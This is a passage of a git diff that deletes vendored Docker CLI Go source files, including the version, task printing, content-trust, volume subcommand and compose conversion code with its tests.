[]func(dockerCli *command.DockerCli) (uint64, string, error){ - prune.RunContainerPrune, - prune.RunVolumePrune, - prune.RunNetworkPrune, - } { - spc, output, err := pruneFn(dockerCli) - if err != nil { - return err - } - spaceReclaimed += spc - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - } - - spc, output, err := prune.RunImagePrune(dockerCli, opts.all) - if err != nil { - return err - } - if spc > 0 { - spaceReclaimed += spc - fmt.Fprintln(dockerCli.Out(), output) - } - - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/system/version.go b/vendor/github.com/docker/docker/cli/command/system/version.go deleted file mode 100644 index ded4f4d118..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/version.go +++ /dev/null @@ -1,113 +0,0 @@ -package system - -import ( - "fmt" - "runtime" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/utils/templates" - "github.com/spf13/cobra" -) - -var versionTemplate = `Client: - Version: {{.Client.Version}} - API version: {{.Client.APIVersion}} - Go version: {{.Client.GoVersion}} - Git commit: {{.Client.GitCommit}} - Built: {{.Client.BuildTime}} - OS/Arch: {{.Client.Os}}/{{.Client.Arch}}{{if .ServerOK}} - -Server: - Version: {{.Server.Version}} - API version: {{.Server.APIVersion}} (minimum version {{.Server.MinAPIVersion}}) - Go version: {{.Server.GoVersion}} - Git commit: {{.Server.GitCommit}} - Built: {{.Server.BuildTime}} - OS/Arch: {{.Server.Os}}/{{.Server.Arch}} - Experimental: {{.Server.Experimental}}{{end}}` - -type versionOptions struct { - format string -} - -// NewVersionCommand creates a new cobra.Command for `docker version` -func NewVersionCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts versionOptions - - cmd := &cobra.Command{ - Use: "version [OPTIONS]", - Short: "Show the Docker version information", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runVersion(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runVersion(dockerCli *command.DockerCli, opts *versionOptions) error { - ctx := context.Background() - - templateFormat := versionTemplate - if opts.format != "" { - templateFormat = opts.format - } - - tmpl, err := templates.Parse(templateFormat) - if err != nil { - return cli.StatusError{StatusCode: 64, - Status: "Template parsing error: " + err.Error()} - } - - APIVersion := dockerCli.Client().ClientVersion() - if defaultAPIVersion := dockerCli.DefaultVersion(); APIVersion != defaultAPIVersion { - APIVersion = fmt.Sprintf("%s (downgraded from %s)", APIVersion, defaultAPIVersion) - } - - vd := types.VersionResponse{ - Client: &types.Version{ - Version: dockerversion.Version, - APIVersion: APIVersion, - GoVersion: runtime.Version(), - GitCommit: dockerversion.GitCommit, - BuildTime: dockerversion.BuildTime, - Os: runtime.GOOS, - Arch: runtime.GOARCH, - }, - } - - serverVersion, err := dockerCli.Client().ServerVersion(ctx) - if err == nil { - vd.Server = &serverVersion - } - - // first we need to make BuildTime more human friendly - t, errTime := time.Parse(time.RFC3339Nano, vd.Client.BuildTime) - if errTime == nil { - vd.Client.BuildTime = t.Format(time.ANSIC) - } - - if vd.ServerOK() { - t, errTime = time.Parse(time.RFC3339Nano, vd.Server.BuildTime) - if errTime == nil { - vd.Server.BuildTime = t.Format(time.ANSIC) - } - } - - if err2 := tmpl.Execute(dockerCli.Out(), vd); err2 != nil && err == nil { - err = err2 - } - dockerCli.Out().Write([]byte{'\n'}) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/task/print.go b/vendor/github.com/docker/docker/cli/command/task/print.go deleted file mode 100644 index 0f1c2cf724..0000000000 --- a/vendor/github.com/docker/docker/cli/command/task/print.go +++ /dev/null @@ -1,161 +0,0 @@ -package task - -import ( - "fmt" - "io" - "sort" - "strings" - "text/tabwriter" - "time" - - "golang.org/x/net/context" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/go-units" -) - -const ( - psTaskItemFmt = "%s\t%s\t%s\t%s\t%s\t%s %s ago\t%s\t%s\n" - maxErrLength = 30 -) - -type portStatus swarm.PortStatus - -func (ps portStatus) String() string { - if len(ps.Ports) == 0 { - return "" - } - - str := fmt.Sprintf("*:%d->%d/%s", ps.Ports[0].PublishedPort, ps.Ports[0].TargetPort, ps.Ports[0].Protocol) - for _, pConfig := range ps.Ports[1:] { - str += fmt.Sprintf(",*:%d->%d/%s", pConfig.PublishedPort, pConfig.TargetPort, pConfig.Protocol) - } - - return str -} - -type tasksBySlot []swarm.Task - -func (t tasksBySlot) Len() int { - return len(t) -} - -func (t tasksBySlot) Swap(i, j int) { - t[i], t[j] = t[j], t[i] -} - -func (t tasksBySlot) Less(i, j int) bool { - // Sort by slot. - if t[i].Slot != t[j].Slot { - return t[i].Slot < t[j].Slot - } - - // If same slot, sort by most recent. - return t[j].Meta.CreatedAt.Before(t[i].CreatedAt) -} - -// Print task information in a table format. -// Besides this, command `docker node ps ` -// and `docker stack ps` will call this, too. -func Print(dockerCli *command.DockerCli, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { - sort.Stable(tasksBySlot(tasks)) - - writer := tabwriter.NewWriter(dockerCli.Out(), 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - fmt.Fprintln(writer, strings.Join([]string{"ID", "NAME", "IMAGE", "NODE", "DESIRED STATE", "CURRENT STATE", "ERROR", "PORTS"}, "\t")) - - if err := print(writer, ctx, tasks, resolver, noTrunc); err != nil { - return err - } - - return nil -} - -// PrintQuiet shows task list in a quiet way. -func PrintQuiet(dockerCli *command.DockerCli, tasks []swarm.Task) error { - sort.Stable(tasksBySlot(tasks)) - - out := dockerCli.Out() - - for _, task := range tasks { - fmt.Fprintln(out, task.ID) - } - - return nil -} - -func print(out io.Writer, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { - prevName := "" - for _, task := range tasks { - id := task.ID - if !noTrunc { - id = stringid.TruncateID(id) - } - - serviceName, err := resolver.Resolve(ctx, swarm.Service{}, task.ServiceID) - if err != nil { - return err - } - - nodeValue, err := resolver.Resolve(ctx, swarm.Node{}, task.NodeID) - if err != nil { - return err - } - - name := "" - if task.Slot != 0 { - name = fmt.Sprintf("%v.%v", serviceName, task.Slot) - } else { - name = fmt.Sprintf("%v.%v", serviceName, task.NodeID) - } - - // Indent the name if necessary - indentedName := name - if name == prevName { - indentedName = fmt.Sprintf(" \\_ %s", indentedName) - } - prevName = name - - // Trim and quote the error message. - taskErr := task.Status.Err - if !noTrunc && len(taskErr) > maxErrLength { - taskErr = fmt.Sprintf("%s…", taskErr[:maxErrLength-1]) - } - if len(taskErr) > 0 { - taskErr = fmt.Sprintf("\"%s\"", taskErr) - } - - image := task.Spec.ContainerSpec.Image - if !noTrunc { - ref, err := distreference.ParseNamed(image) - if err == nil { - // update image string for display - namedTagged, ok := ref.(distreference.NamedTagged) - if ok { - image = namedTagged.Name() + ":" + namedTagged.Tag() - } - } - } - - fmt.Fprintf( - out, - psTaskItemFmt, - id, - indentedName, - image, - nodeValue, - command.PrettyPrint(task.DesiredState), - command.PrettyPrint(task.Status.State), - strings.ToLower(units.HumanDuration(time.Since(task.Status.Timestamp))), - taskErr, - portStatus(task.Status.PortStatus), - ) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/trust.go b/vendor/github.com/docker/docker/cli/command/trust.go deleted file mode 100644 index b4c8a84ee5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/trust.go +++ /dev/null @@ -1,39 +0,0 @@ -package command - -import ( - "os" - "strconv" - - "github.com/spf13/pflag" -) - -var ( - // TODO: make this not global - untrusted bool -) - -// AddTrustedFlags adds content trust flags to the current command flagset -func AddTrustedFlags(fs *pflag.FlagSet, verify bool) { - trusted, message := setupTrustedFlag(verify) - fs.BoolVar(&untrusted, "disable-content-trust", !trusted, message) -} - -func setupTrustedFlag(verify bool) (bool, string) { - var trusted bool - if e := os.Getenv("DOCKER_CONTENT_TRUST"); e != "" { - if t, err := strconv.ParseBool(e); t || err != nil { - // treat any other value as true - trusted = true - } - } - message := "Skip image signing" - if verify { - message = "Skip image verification" - } - return trusted, message -} - -// IsTrusted returns true if content trust is enabled -func IsTrusted() bool { - return !untrusted -} diff --git a/vendor/github.com/docker/docker/cli/command/utils.go b/vendor/github.com/docker/docker/cli/command/utils.go deleted file mode 100644 index 1837ca41f0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/utils.go +++ /dev/null @@ -1,87 +0,0 @@ -package command - -import ( - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "runtime" - "strings" -) - -// CopyToFile writes the content of the reader to the specified file -func CopyToFile(outfile string, r io.Reader) error { - tmpFile, err := ioutil.TempFile(filepath.Dir(outfile), ".docker_temp_") - if err != nil { - return err - } - - tmpPath := tmpFile.Name() - - _, err = io.Copy(tmpFile, r) - tmpFile.Close() - - if err != nil { - os.Remove(tmpPath) - return err - } - - if err = os.Rename(tmpPath, outfile); err != nil { - os.Remove(tmpPath) - return err - } - - return nil -} - -// capitalizeFirst capitalizes the first character of string -func capitalizeFirst(s string) string { - switch l := len(s); l { - case 0: - return s - case 1: - return strings.ToLower(s) - default: - return strings.ToUpper(string(s[0])) + strings.ToLower(s[1:]) - } -} - -// PrettyPrint outputs arbitrary data for human formatted output by uppercasing the first letter. -func PrettyPrint(i interface{}) string { - switch t := i.(type) { - case nil: - return "None" - case string: - return capitalizeFirst(t) - default: - return capitalizeFirst(fmt.Sprintf("%s", t)) - } -} - -// PromptForConfirmation requests and checks confirmation from user. -// This will display the provided message followed by ' [y/N] '. If -// the user input 'y' or 'Y' it returns true other false. If no -// message is provided "Are you sure you want to proceed? [y/N] " -// will be used instead. -func PromptForConfirmation(ins *InStream, outs *OutStream, message string) bool { - if message == "" { - message = "Are you sure you want to proceed?" - } - message += " [y/N] " - - fmt.Fprintf(outs, message) - - // On Windows, force the use of the regular OS stdin stream. - if runtime.GOOS == "windows" { - ins = NewInStream(os.Stdin) - } - - answer := "" - n, _ := fmt.Fscan(ins, &answer) - if n != 1 || (answer != "y" && answer != "Y") { - return false - } - - return true -} diff --git a/vendor/github.com/docker/docker/cli/command/volume/cmd.go b/vendor/github.com/docker/docker/cli/command/volume/cmd.go deleted file mode 100644 index 40862f29d1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/cmd.go +++ /dev/null @@ -1,45 +0,0 @@ -package volume - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewVolumeCommand returns a cobra command for `volume` subcommands -func NewVolumeCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "volume COMMAND", - Short: "Manage volumes", - Long: volumeDescription, - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newCreateCommand(dockerCli), - newInspectCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} - -var volumeDescription = ` -The **docker volume** command has subcommands for managing data volumes. A data -volume is a specially-designated directory that by-passes storage driver -management. - -Data volumes persist data independent of a container's life cycle. When you -delete a container, the Docker daemon does not delete any data volumes. You can -share volumes across multiple containers. Moreover, you can share data volumes -with other computing resources in your system. - -To see help for a subcommand, use: - - docker volume COMMAND --help - -For full details on using docker volume visit Docker's online documentation. - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/create.go b/vendor/github.com/docker/docker/cli/command/volume/create.go deleted file mode 100644 index 7b2a7e3318..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/create.go +++ /dev/null @@ -1,111 +0,0 @@ -package volume - -import ( - "fmt" - - "golang.org/x/net/context" - - volumetypes "github.com/docker/docker/api/types/volume" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type createOptions struct { - name string - driver string - driverOpts opts.MapOpts - labels opts.ListOpts -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := createOptions{ - driverOpts: *opts.NewMapOpts(nil, nil), - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - } - - cmd := &cobra.Command{ - Use: "create [OPTIONS] [VOLUME]", - Short: "Create a volume", - Long: createDescription, - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - if len(args) == 1 { - if opts.name != "" { - fmt.Fprint(dockerCli.Err(), "Conflicting options: either specify --name or provide positional arg, not both\n") - return cli.StatusError{StatusCode: 1} - } - opts.name = args[0] - } - return runCreate(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.StringVarP(&opts.driver, "driver", "d", "local", "Specify volume driver name") - flags.StringVar(&opts.name, "name", "", "Specify volume name") - flags.Lookup("name").Hidden = true - flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") - flags.Var(&opts.labels, "label", "Set metadata for a volume") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts createOptions) error { - client := dockerCli.Client() - - volReq := volumetypes.VolumesCreateBody{ - Driver: opts.driver, - DriverOpts: opts.driverOpts.GetAll(), - Name: opts.name, - Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), - } - - vol, err := client.VolumeCreate(context.Background(), volReq) - if err != nil { - return err - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", vol.Name) - return nil -} - -var createDescription = ` -Creates a new volume that containers can consume and store data in. If a name -is not specified, Docker generates a random name. You create a volume and then -configure the container to use it, for example: - - $ docker volume create hello - hello - $ docker run -d -v hello:/world busybox ls /world - -The mount is created inside the container's **/src** directory. Docker doesn't -not support relative paths for mount points inside the container. - -Multiple containers can use the same volume in the same time period. This is -useful if two containers need access to shared data. For example, if one -container writes and the other reads the data. - -## Driver specific options - -Some volume drivers may take options to customize the volume creation. Use the -**-o** or **--opt** flags to pass driver options: - - $ docker volume create --driver fake --opt tardis=blue --opt timey=wimey - -These options are passed directly to the volume driver. Options for different -volume drivers may do different things (or nothing at all). - -The built-in **local** driver on Windows does not support any options. - -The built-in **local** driver on Linux accepts options similar to the linux -**mount** command: - - $ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 - -Another example: - - $ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/inspect.go b/vendor/github.com/docker/docker/cli/command/volume/inspect.go deleted file mode 100644 index 5eb8ad2516..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/inspect.go +++ /dev/null @@ -1,55 +0,0 @@ -package volume - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - names []string -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] VOLUME [VOLUME...]", - Short: "Display detailed information on one or more volumes", - Long: inspectDescription, - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.names = args - return runInspect(dockerCli, opts) - }, - } - - cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - - ctx := context.Background() - - getVolFunc := func(name string) (interface{}, []byte, error) { - i, err := client.VolumeInspect(ctx, name) - return i, nil, err - } - - return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getVolFunc) -} - -var inspectDescription = ` -Returns information about one or more volumes. By default, this command renders -all results in a JSON array. You can specify an alternate format to execute a -given template is executed for each result. Go's https://golang.org/pkg/text/template/ -package describes all the details of the format. - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/list.go b/vendor/github.com/docker/docker/cli/command/volume/list.go deleted file mode 100644 index d76006a1b2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/list.go +++ /dev/null @@ -1,91 +0,0 @@ -package volume - -import ( - "sort" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type byVolumeName []*types.Volume - -func (r byVolumeName) Len() int { return len(r) } -func (r byVolumeName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byVolumeName) Less(i, j int) bool { - return r[i].Name < r[j].Name -} - -type listOptions struct { - quiet bool - format string - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List volumes", - Long: listDescription, - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display volume names") - flags.StringVar(&opts.format, "format", "", "Pretty-print volumes using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'dangling=true')") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - volumes, err := client.VolumeList(context.Background(), opts.filter.Value()) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().VolumesFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().VolumesFormat - } else { - format = formatter.TableFormatKey - } - } - - sort.Sort(byVolumeName(volumes.Volumes)) - - volumeCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewVolumeFormat(format, opts.quiet), - } - return formatter.VolumeWrite(volumeCtx, volumes.Volumes) -} - -var listDescription = ` - -Lists all the volumes Docker manages. You can filter using the **-f** or -**--filter** flag. The filtering format is a **key=value** pair. To specify -more than one filter, pass multiple flags (for example, -**--filter "foo=bar" --filter "bif=baz"**) - -The currently supported filters are: - -* **dangling** (boolean - **true** or **false**, **1** or **0**) -* **driver** (a volume driver's name) -* **label** (**label=** or **label==**) -* **name** (a volume's name) - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/prune.go b/vendor/github.com/docker/docker/cli/command/volume/prune.go deleted file mode 100644 index 405fbeb295..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/prune.go +++ /dev/null @@ -1,75 +0,0 @@ -package volume - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool -} - -// NewPruneCommand returns a new cobra prune command for volumes -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove all unused volumes", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - spaceReclaimed, output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - - return cmd -} - -const warning = `WARNING! This will remove all volumes not used by at least one container. -Are you sure you want to continue?` - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().VolumesPrune(context.Background(), filters.Args{}) - if err != nil { - return - } - - if len(report.VolumesDeleted) > 0 { - output = "Deleted Volumes:\n" - for _, id := range report.VolumesDeleted { - output += id + "\n" - } - spaceReclaimed = report.SpaceReclaimed - } - - return -} - -// RunPrune calls the Volume Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return runPrune(dockerCli, pruneOptions{force: true}) -} diff --git a/vendor/github.com/docker/docker/cli/command/volume/remove.go b/vendor/github.com/docker/docker/cli/command/volume/remove.go deleted file mode 100644 index f464bb3e1a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/remove.go +++ /dev/null @@ -1,68 +0,0 @@ -package volume - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - force bool - - volumes []string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] VOLUME [VOLUME...]", - Aliases: []string{"remove"}, - Short: "Remove one or more volumes", - Long: removeDescription, - Example: removeExample, - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.volumes = args - return runRemove(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of one or more volumes") - flags.SetAnnotation("force", "version", []string{"1.25"}) - return cmd -} - -func runRemove(dockerCli *command.DockerCli, opts *removeOptions) error { - client := dockerCli.Client() - ctx := context.Background() - status := 0 - - for _, name := range opts.volumes { - if err := client.VolumeRemove(ctx, name, opts.force); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - status = 1 - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - - if status != 0 { - return cli.StatusError{StatusCode: status} - } - return nil -} - -var removeDescription = ` -Remove one or more volumes. You cannot remove a volume that is in use by a container. -` - -var removeExample = ` -$ docker volume rm hello -hello -` diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose.go b/vendor/github.com/docker/docker/cli/compose/convert/compose.go deleted file mode 100644 index 8122326aa5..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/compose.go +++ /dev/null @@ -1,116 +0,0 @@ -package convert - -import ( - "io/ioutil" - - "github.com/docker/docker/api/types" - networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/api/types/swarm" - composetypes "github.com/docker/docker/cli/compose/types" -) - -const ( - // LabelNamespace is the label used to track stack resources - LabelNamespace = "com.docker.stack.namespace" -) - -// Namespace mangles names by prepending the name -type Namespace struct { - name string -} - -// Scope prepends the namespace to a name -func (n Namespace) Scope(name string) string { - return n.name + "_" + name -} - -// Name returns the name of the namespace -func (n Namespace) Name() string { - return n.name -} - -// NewNamespace returns a new Namespace for scoping of names -func NewNamespace(name string) Namespace { - return Namespace{name: name} -} - -// AddStackLabel returns labels with the namespace label added -func AddStackLabel(namespace Namespace, labels map[string]string) map[string]string { - if labels == nil { - labels = make(map[string]string) - } - labels[LabelNamespace] = namespace.name - return labels -} - -type networkMap map[string]composetypes.NetworkConfig - -// Networks converts networks from the compose-file type to the engine API type -func Networks( - namespace Namespace, - networks networkMap, - servicesNetworks map[string]struct{}, -) (map[string]types.NetworkCreate, []string) { - if networks == nil { - networks = make(map[string]composetypes.NetworkConfig) - } - - externalNetworks := []string{} - result := make(map[string]types.NetworkCreate) - - for internalName := range servicesNetworks { - network := networks[internalName] - if network.External.External { - externalNetworks = append(externalNetworks, network.External.Name) - continue - } - - createOpts := types.NetworkCreate{ - Labels: AddStackLabel(namespace, network.Labels), - Driver: network.Driver, - Options: network.DriverOpts, - Internal: network.Internal, - } - - if network.Ipam.Driver != "" || len(network.Ipam.Config) > 0 { - createOpts.IPAM = &networktypes.IPAM{} - } - - if network.Ipam.Driver != "" { - createOpts.IPAM.Driver = network.Ipam.Driver - } - for _, ipamConfig := range network.Ipam.Config { - config := networktypes.IPAMConfig{ - Subnet: ipamConfig.Subnet, - } - createOpts.IPAM.Config = append(createOpts.IPAM.Config, config) - } - result[internalName] = createOpts - } - - return result, externalNetworks -} - -// Secrets converts secrets from the Compose type to the engine API type -func Secrets(namespace Namespace, secrets map[string]composetypes.SecretConfig) ([]swarm.SecretSpec, error) { - result := []swarm.SecretSpec{} - for name, secret := range secrets { - if secret.External.External { - continue - } - - data, err := ioutil.ReadFile(secret.File) - if err != nil { - return nil, err - } - - result = append(result, swarm.SecretSpec{ - Annotations: swarm.Annotations{ - Name: namespace.Scope(name), - Labels: AddStackLabel(namespace, secret.Labels), - }, - Data: data, - }) - } - return result, nil -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go deleted file mode 100644 index f333d73fda..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go +++ /dev/null @@ -1,122 +0,0 @@ -package convert - -import ( - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/network" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/pkg/testutil/tempfile" -) - -func TestNamespaceScope(t *testing.T) { - scoped := Namespace{name: "foo"}.Scope("bar") - assert.Equal(t, scoped, "foo_bar") -} - -func TestAddStackLabel(t *testing.T) { - labels := map[string]string{ - "something": "labeled", - } - actual := AddStackLabel(Namespace{name: "foo"}, labels) - expected := map[string]string{ - "something": "labeled", - LabelNamespace: "foo", - } - assert.DeepEqual(t, actual, expected) -} - -func TestNetworks(t *testing.T) { - namespace := Namespace{name: "foo"} - source := networkMap{ - "normal": composetypes.NetworkConfig{ - Driver: "overlay", - DriverOpts: map[string]string{ - "opt": "value", - }, - Ipam: composetypes.IPAMConfig{ - Driver: "driver", - Config: []*composetypes.IPAMPool{ - { - Subnet: "10.0.0.0", - }, - }, - }, - Labels: map[string]string{ - "something": "labeled", - }, - }, - "outside": composetypes.NetworkConfig{ - External: composetypes.External{ - External: true, - Name: "special", - }, - }, - } - expected := map[string]types.NetworkCreate{ - "default": { - Labels: map[string]string{ - LabelNamespace: "foo", - }, - }, - "normal": { - Driver: "overlay", - IPAM: &network.IPAM{ - Driver: "driver", - Config: []network.IPAMConfig{ - { - Subnet: "10.0.0.0", - }, - }, - }, - Options: map[string]string{ - "opt": "value", - }, - Labels: map[string]string{ - LabelNamespace: "foo", - "something": "labeled", - }, - }, - } - - serviceNetworks := map[string]struct{}{ - "default": {}, - "normal": {}, - "outside": {}, - } - networks, externals := Networks(namespace, source, serviceNetworks) - assert.DeepEqual(t, networks, expected) - assert.DeepEqual(t, externals, []string{"special"}) -} - -func TestSecrets(t *testing.T) { - namespace := Namespace{name: "foo"} - - secretText := "this is the first secret" - secretFile := tempfile.NewTempFile(t, "convert-secrets", secretText) - defer secretFile.Remove() - - source := map[string]composetypes.SecretConfig{ - "one": { - File: secretFile.Name(), - Labels: map[string]string{"monster": "mash"}, - }, - "ext": { - External: composetypes.External{ - External: true, - }, - }, - } - - specs, err := Secrets(namespace, source) - assert.NilError(t, err) - assert.Equal(t, len(specs), 1) - secret := specs[0] - assert.Equal(t, secret.Name, "foo_one") - assert.DeepEqual(t, secret.Labels, map[string]string{ - "monster": "mash", - LabelNamespace: "foo", - }) - assert.DeepEqual(t, secret.Data, []byte(secretText)) -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service.go b/vendor/github.com/docker/docker/cli/compose/convert/service.go deleted file mode 100644 index 4a5489562c..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/service.go +++ /dev/null @@ -1,416 +0,0 @@ -package convert - -import ( - "fmt" - "os" - "sort" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/swarm" - servicecli "github.com/docker/docker/cli/command/service" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/client" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-connections/nat" -) - -// Services from compose-file types to engine API types -// TODO: fix secrets API so that SecretAPIClient is not required here -func Services( - namespace Namespace, - config *composetypes.Config, - client client.SecretAPIClient, -) (map[string]swarm.ServiceSpec, error) { - result := make(map[string]swarm.ServiceSpec) - - services := config.Services - volumes := config.Volumes - networks := config.Networks - - for _, service := range services { - - secrets, err := convertServiceSecrets(client, namespace, service.Secrets, config.Secrets) - if err != nil { - return nil, err - } - serviceSpec, err := convertService(namespace, service, networks, volumes, secrets) - if err != nil { - return nil, err - } - result[service.Name] = serviceSpec - } - - return result, nil -} - -func convertService( - namespace Namespace, - service composetypes.ServiceConfig, - networkConfigs map[string]composetypes.NetworkConfig, - volumes map[string]composetypes.VolumeConfig, - secrets []*swarm.SecretReference, -) (swarm.ServiceSpec, error) { - name := namespace.Scope(service.Name) - - endpoint, err := convertEndpointSpec(service.Ports) - if err != nil { - return swarm.ServiceSpec{}, err - } - - mode, err := convertDeployMode(service.Deploy.Mode, service.Deploy.Replicas) - if err != nil { - return swarm.ServiceSpec{}, err - } - - mounts, err := Volumes(service.Volumes, volumes, namespace) - if err != nil { - // TODO: better error message (include service name) - return swarm.ServiceSpec{}, err - } - - resources, err := convertResources(service.Deploy.Resources) - if err != nil { - return swarm.ServiceSpec{}, err - } - - restartPolicy, err := convertRestartPolicy( - service.Restart, service.Deploy.RestartPolicy) - if err != nil { - return swarm.ServiceSpec{}, err - } - - healthcheck, err 